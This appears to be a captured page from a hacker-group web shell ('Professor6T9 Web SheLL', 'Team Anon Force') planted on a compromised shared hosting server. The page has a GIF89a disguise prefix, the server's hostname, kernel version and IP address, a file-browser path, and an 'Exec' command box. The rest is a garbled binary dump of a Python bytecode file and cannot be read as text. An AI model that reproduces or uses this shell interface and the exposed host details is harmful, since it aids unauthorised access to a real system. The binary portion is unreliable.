GIF89;aGIF89;aGIF89;a
Team Anon Force
https://t.me/Professor6T9x
Professor6T9 Web SheLL
Linux host69.registrar-servers.com 4.18.0-513.18.1.lve.2.el8.x86_64 #1 SMP Sat Mar 30 15:36:11 UTC 2024 x86_64
Apache
68.65.123.79
/
opt
/
alt
/
python312
/
lib
/
python3.12
/
site-packages
/
pip
/
_vendor
/
tenacity
/
__pycache__
[ HOME ]
Exec
Submit
nap.cpython-312.pyc
� R`ig � �X � d dl Z d dlZej rd dlZdeddfd�Z G d� d� Zy)� N�seconds�returnc �. � t j | � y)z� Sleep strategy that delays execution for a given number of seconds. This is the default strategy, and may be mocked out for unit testing. N)�time�sleep)r s ��/builddir/build/BUILDROOT/alt-python312-pip-23.3.1-3.el8.x86_64/opt/alt/python312/lib/python3.12/site-packages/pip/_vendor/tenacity/nap.pyr r s � � �J�J�w�� c �B � e Zd ZdZdd�Zdej e ddfd�Zy)�sleep_using_eventz0Sleep strategy that waits on an event to be set.r Nc � � || _ y )N)�event)�selfr s r �__init__zsleep_using_event.__init__% s � ��� r �timeoutc �<